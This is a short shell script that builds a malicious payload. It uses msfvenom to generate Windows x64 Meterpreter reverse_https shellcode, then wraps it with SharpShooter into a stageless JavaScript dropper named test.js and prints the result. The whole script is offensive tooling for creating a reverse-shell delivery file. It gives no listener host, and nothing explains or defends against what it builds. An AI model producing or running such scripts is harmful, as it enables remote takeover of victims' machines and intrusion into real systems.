#!/bin/sh

set -e

msfvenom -p windows/x64/meterpreter/reverse_https -f raw -o shell.txt 2>&1
sharpshooter --payload js --dotnetver 4 --stageless --rawscfile shell.txt --output test

echo
echo --------------------------------------------------------------------------------
cat test.js
